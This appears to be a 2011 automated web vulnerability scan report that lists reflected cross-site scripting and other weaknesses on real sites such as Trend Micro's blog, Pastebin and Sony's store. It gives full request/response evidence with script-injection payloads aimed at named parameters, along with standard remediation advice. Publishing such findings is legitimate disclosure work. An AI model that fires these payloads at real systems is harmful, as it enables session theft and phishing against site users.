XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09072011-03 Report generated by XSS.CX at Wed Sep 07 14:16:34 GMT-06:00 2011. Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | Loading
1. Cross-site scripting (reflected)
1.1. http://blog.trendmicro.com/ [s parameter]
1.2. http://display.digitalriver.com/ [aid parameter]
1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]
1.4. http://display.digitalriver.com/ [tax parameter]
1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]
1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]
1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]
1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]
1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]
1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]
1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]
1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]
1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]
1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]
1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]
1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]
1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]
1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]
1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]
1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]
1.21. http://pastebin.com/i/style.css [REST URL parameter 1]
1.22. http://pastebin.com/i/style.css [REST URL parameter 2]
1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]
1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]
1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]
1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]
1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]
1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]
1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]
1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]
1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]
1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]
1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]
1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]
1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]
1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]
1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]
1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]
1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]
1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]
1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]
1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]
1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]
1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]
1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]
2. Flash cross-domain policy
2.1. http://www.viddler.com/crossdomain.xml
2.2. http://blog.trendmicro.com/crossdomain.xml
2.3. http://wd.sharethis.com/crossdomain.xml
2.4. http://www.typepad.com/crossdomain.xml
3. Cleartext submission of password
3.1. http://webconnect.sendouts.com/login.aspx
3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp
3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
4. Session token in URL
4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
5. Password field submitted using GET method
6. ASP.NET ViewState without MAC enabled
6.1. http://webconnect.sendouts.com/forgot-login.aspx
6.2. http://webconnect.sendouts.com/job-search.aspx
6.3. http://webconnect.sendouts.com/login.aspx
7. Cookie without HttpOnly flag set
7.1. http://www.kb.sony.com/
7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do
7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp
7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp
7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp
7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do
7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/
7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg
7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg
7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect
7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
7.15. https://www.ca.com/siteminderagent/forms/login.fcc
7.16. https://www.ca.com/us/register/login.aspx
8. Password field with autocomplete enabled
8.1. http://webconnect.sendouts.com/login.aspx
8.2. https://www.ca.com/us/register/createprofile.aspx
8.3. https://www.ca.com/us/register/login.aspx
8.4. https://www.ca.com/us/register/login.aspx
8.5. https://www.ca.com/us/register/login.aspx
8.6. https://www.ca.com/us/register/login.aspx
8.7. https://www.ca.com/us/register/login.aspx
8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp
8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
9. Referer-dependent response
9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
9.2. http://www.viddler.com/embed/dca1712/
9.3. http://www.viddler.com/player/dca1712/0
10. SSL cookie without secure flag set
10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
10.2. https://www.ca.com/siteminderagent/forms/login.fcc
10.3. https://www.ca.com/us/register/login.aspx
11. Cookie scoped to parent domain
11.1. https://www.ca.com/siteminderagent/forms/login.fcc
11.2. https://www.ca.com/us/register/login.aspx
12. Cross-domain Referer leakage
12.1. http://blog.trendmicro.com/
12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
12.6. https://store.trendmicro.com/DRHM/store
12.7. https://store.trendmicro.com/store
12.8. https://www.ca.com/us/register/createprofile.aspx
12.9. https://www.ca.com/us/register/login.aspx
12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
12.11. http://www.kb.sony.com/selfservice/microsites/search.do
12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do
13. Cross-domain script include
13.1. http://blog.trendmicro.com/
13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/
13.4. http://blog.trendmicro.com/category/exploits/
13.5. http://blog.trendmicro.com/category/pharming/
13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/
13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
13.8. http://pastebin.com/bq8xJPMn
13.9. http://pastebin.com/etc/ads/iframes/160x600.html
13.10. http://pastebin.com/etc/ads/iframes/728x90.html
13.11. http://pastebin.com/etc/social/index.html
13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
13.15. https://store.trendmicro.com/DRHM/store
13.16. https://store.trendmicro.com/store
13.17. https://www.ca.com/us/register/createprofile.aspx
13.18. https://www.ca.com/us/register/forgotpassword.aspx
13.19. https://www.ca.com/us/register/login.aspx
13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp
13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
14. TRACE method is enabled
15. Email addresses disclosed
15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js
15.2. http://pastebin.com/bq8xJPMn
15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
15.6. https://www.ca.com/us/register/createprofile.aspx
15.7. https://www.ca.com/us/register/forgotpassword.aspx
15.8. https://www.ca.com/us/register/login.aspx
15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js
16. Private IP addresses disclosed
16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js
16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js
16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js
16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js
17. Robots.txt file
17.1. http://blog.trendmicro.com/
17.2. http://display.digitalriver.com/
17.3. http://pastebin.com/i/fixed.css
17.4. https://store.trendmicro.com/store
17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp
17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
17.7. http://www.viddler.com/embed/dca1712/
18. Cacheable HTTPS response
19. HTML does not specify charset
19.1. http://display.digitalriver.com/
19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
19.3. http://wd.sharethis.com/api/getCount2.php
19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html
20. Content type incorrectly stated
20.1. http://display.digitalriver.com/
20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
20.3. https://store.trendmicro.com/favicon.ico
20.4. http://wd.sharethis.com/api/getCount2.php
20.5. https://www.ca.com/images/icons/checkmark.gif
20.6. http://www.javaworld.com/favicon.ico
21. Content type is not specified
21.1. http://www.javalobby.org/favicon.ico
21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1
21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1
21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
22. SSL certificate
22.1. https://store.trendmicro.com/
22.2. https://www.ca.com/
1. Cross-site scripting (reflected)
next
There are 49 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
1.1. http://blog.trendmicro.com/ [s parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload 60122<script>alert(1)</script>7e9986f3a17 was submitted in the s parameter. This input was echoed unmodified in the application's response.
Request
GET /?s=xss60122<script>alert(1)</script>7e9986f3a17 &Submit=+Go+ HTTP/1.1.com/category/exploits//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.3.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=3; bn_u=6923713914570485926; cmRS=&t1=1315351005853&t2=1315351007808&t3=-1&t4=1315351004379&fti=1315351012197&fn=UNDEFINED%3A0%3B&ac=0:S&fd=0%3A1%3ASubmit%3B0%3A0%3As%3B&uer=&fu=/&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... 60122<script>alert(1)</script>7e9986f3a17 <br />...[SNIP]...
1.2. http://display.digitalriver.com/ [aid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c82'-alert(1)-'417cdac0750 was submitted in the aid parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244a6c82'-alert(1)-'417cdac0750 &tax=trend_micro HTTP/1.1/us/home/;q=0.302x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK'SCRIPT');.protocol + '//a.netmng.com/?aid=244a6c82'-alert(1)-'417cdac0750 &tax=trend_micro';ByTagName('head')[0].appendChild(dgt_script);
1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a55b'-alert(1)-'0024805587a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a =1 HTTP/1.1/us/home/;q=0.302x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK'SCRIPT');.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a =1';ByTagName('head')[0].appendChild(dgt_script);
1.4. http://display.digitalriver.com/ [tax parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76aea'-alert(1)-'2f2fe981849 was submitted in the tax parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849 HTTP/1.1/us/home/;q=0.302x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK'SCRIPT');.protocol + '//a.netmng.com/?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849 ';ByTagName('head')[0].appendChild(dgt_script);
1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bda"><script>alert(1)</script>e6654f051f5 was submitted in the REST URL parameter 1. This input was echoed as 75bda\"><script>alert(1)</script>e6654f051f5 in the application's response.
Request
GET /bq8xJPMn75bda"><script>alert(1)</script>e6654f051f5 HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/bq8xJPMn75bda\"><script>alert(1)</script>e6654f051f5 "/>...[SNIP]...
1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba897"><script>alert(1)</script>b386f4c98c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba897\"><script>alert(1)</script>b386f4c98c8 in the application's response.
Request
GET /bq8xJPMn?ba897"><script>alert(1)</script>b386f4c98c8 =1 HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/bq8xJPMn?ba897\"><script>alert(1)</script>b386f4c98c8 =1"/>...[SNIP]...
1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4be"><script>alert(1)</script>1b7c01d5428 was submitted in the REST URL parameter 1. This input was echoed as fd4be\"><script>alert(1)</script>1b7c01d5428 in the application's response.
Request
GET /etcfd4be"><script>alert(1)</script>1b7c01d5428 /ads/iframes/160x600.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etcfd4be\"><script>alert(1)</script>1b7c01d5428 /ads/iframes/160x600.html"/>...[SNIP]...
1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca1b0"><script>alert(1)</script>e6b4ca5c2bf was submitted in the REST URL parameter 2. This input was echoed as ca1b0\"><script>alert(1)</script>e6b4ca5c2bf in the application's response.
Request
GET /etc/adsca1b0"><script>alert(1)</script>e6b4ca5c2bf /iframes/160x600.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/adsca1b0\"><script>alert(1)</script>e6b4ca5c2bf /iframes/160x600.html"/>...[SNIP]...
1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88792"><script>alert(1)</script>442cfd43152 was submitted in the REST URL parameter 3. This input was echoed as 88792\"><script>alert(1)</script>442cfd43152 in the application's response.
Request
GET /etc/ads/iframes88792"><script>alert(1)</script>442cfd43152 /160x600.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/ads/iframes88792\"><script>alert(1)</script>442cfd43152 /160x600.html"/>...[SNIP]...
1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448e"><script>alert(1)</script>4efdc9546fc was submitted in the REST URL parameter 4. This input was echoed as 5448e\"><script>alert(1)</script>4efdc9546fc in the application's response.
Request
GET /etc/ads/iframes/160x600.html5448e"><script>alert(1)</script>4efdc9546fc HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/ads/iframes/160x600.html5448e\"><script>alert(1)</script>4efdc9546fc "/>...[SNIP]...
1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2ff"><script>alert(1)</script>c79d6fd4ca4 was submitted in the REST URL parameter 1. This input was echoed as ab2ff\"><script>alert(1)</script>c79d6fd4ca4 in the application's response.
Request
GET /etcab2ff"><script>alert(1)</script>c79d6fd4ca4 /ads/iframes/728x90.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etcab2ff\"><script>alert(1)</script>c79d6fd4ca4 /ads/iframes/728x90.html"/>...[SNIP]...
1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeee0"><script>alert(1)</script>1adcfa6439a was submitted in the REST URL parameter 2. This input was echoed as eeee0\"><script>alert(1)</script>1adcfa6439a in the application's response.
Request
GET /etc/adseeee0"><script>alert(1)</script>1adcfa6439a /iframes/728x90.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/adseeee0\"><script>alert(1)</script>1adcfa6439a /iframes/728x90.html"/>...[SNIP]...
1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c601a"><script>alert(1)</script>f7bf1eddb58 was submitted in the REST URL parameter 3. This input was echoed as c601a\"><script>alert(1)</script>f7bf1eddb58 in the application's response.
Request
GET /etc/ads/iframesc601a"><script>alert(1)</script>f7bf1eddb58 /728x90.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/ads/iframesc601a\"><script>alert(1)</script>f7bf1eddb58 /728x90.html"/>...[SNIP]...
1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1424"><script>alert(1)</script>aa0b6363e32 was submitted in the REST URL parameter 4. This input was echoed as a1424\"><script>alert(1)</script>aa0b6363e32 in the application's response.
Request
GET /etc/ads/iframes/728x90.htmla1424"><script>alert(1)</script>aa0b6363e32 HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/ads/iframes/728x90.htmla1424\"><script>alert(1)</script>aa0b6363e32 "/>...[SNIP]...
1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6c5"><script>alert(1)</script>0582bb56850 was submitted in the REST URL parameter 1. This input was echoed as 9b6c5\"><script>alert(1)</script>0582bb56850 in the application's response.
Request
GET /etc9b6c5"><script>alert(1)</script>0582bb56850 /social/index.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc9b6c5\"><script>alert(1)</script>0582bb56850 /social/index.html"/>...[SNIP]...
1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4fe"><script>alert(1)</script>732c7f33cfd was submitted in the REST URL parameter 2. This input was echoed as 7f4fe\"><script>alert(1)</script>732c7f33cfd in the application's response.
Request
GET /etc/social7f4fe"><script>alert(1)</script>732c7f33cfd /index.html HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/social7f4fe\"><script>alert(1)</script>732c7f33cfd /index.html"/>...[SNIP]...
